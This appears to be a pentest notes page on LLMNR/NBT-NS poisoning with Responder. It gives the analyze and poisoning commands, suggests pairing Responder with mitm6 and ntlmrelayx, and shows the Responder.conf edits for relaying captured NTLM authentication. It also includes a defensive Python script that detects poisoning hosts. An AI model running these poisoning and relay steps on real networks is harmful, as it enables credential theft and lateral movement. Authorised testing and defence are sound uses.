Secondary Categories: 02-Credential Access, 02-Lateral Movement

Responder

When performing an internal network penetration test I usually start by running Responder in Analyze mode to see whether outdated name-resolution protocols such as LLMNR and/or NBT-NS are in use.

#Analyze Mode
responder -I eth0 -A
 
#Begin poisoning requests
responder -I eth0

This can also be coupled with mitm6 to poison even more requests.
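The same LLMNR behaviour that Analyze mode listens for can be checked actively from the defender's side. The following is an added Python example, not code from this page or from the Responder project: it sends an LLMNR query for a random name that cannot exist and reports any host that answers, since on a clean segment nobody should. The multicast group and port come from RFC 4795; the function names (build_llmnr_query, parse_answer_ips, probe) are mine, and running probe() assumes the machine has an interface on the segment being checked.

```python
import random
import socket
import struct
from contextlib import suppress
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355          # RFC 4795 multicast group and port

def build_llmnr_query(name: str, txid: int) -> bytes:
    # LLMNR reuses the DNS wire format: 12-byte header followed by one A/IN question
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack("!HH", 1, 1)

def _skip_name(data: bytes, off: int) -> int:
    if data[off] & 0xC0 == 0xC0:                      # compression pointer, 2 bytes
        return off + 2
    while data[off]:                                  # length-prefixed labels, 0 terminates
        off += data[off] + 1
    return off + 1

def parse_answer_ips(data: bytes, txid: int) -> list[str]:
    # A-record IPs in a response to our transaction ID; [] for anything else or malformed data
    try:
        rid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
        if rid != txid or not flags & 0x8000:         # not ours, or not a response
            return []
        off = 12
        for _ in range(qd):                           # skip the echoed question section
            off = _skip_name(data, off) + 4
        ips = []
        for _ in range(an):
            off = _skip_name(data, off)
            rtype, _, _, rdlen = struct.unpack("!HHIH", data[off:off + 10])
            if rtype == 1 and rdlen == 4:
                ips.append(socket.inet_ntoa(data[off + 10:off + 14]))
            off += 10 + rdlen
        return ips
    except (IndexError, struct.error):
        return []

def probe(timeout: float = 2.0) -> dict[str, list[str]]:
    # Query a random (constructed) name that cannot exist; any answer means a host is poisoning LLMNR
    name, txid = "%012x" % random.getrandbits(48), random.randrange(1, 0xFFFF)
    hits: dict[str, list[str]] = {}                   # answering source IP -> claimed A records
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock, suppress(socket.timeout):
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        while True:
            data, (src, _) = sock.recvfrom(1024)
            if ips := parse_answer_ips(data, txid):
                hits[src] = ips
    return hits
```

Any entry returned by probe() is a host claiming a name that does not exist, which is exactly what Responder does when poisoning; the source address tells you where to look.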

Another great method is to utilize Responder, mitm6, and ntlmrelayx together to capture and relay credentials.

If we are able to leverage LLMNR and NBT-NS, other tools can build on this, but first we need to edit the Responder.conf file located at /usr/share/responder/Responder.conf.

We need to change SMB and HTTP from On to Off so that Responder no longer answers those two protocols itself and ntlmrelayx can handle the incoming authentication instead.

# /usr/share/responder/Responder.conf
 
SQL = On
SMB = Off
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = Off
HTTPS = On
DNS = On
LDAP = On
  • It is optional, but highly recommended, to log captured hashes to a file in addition to whatever method or tactic is used during ntlmrelayx. The hashes can be written to a file with the -of flag of ntlmrelayx.
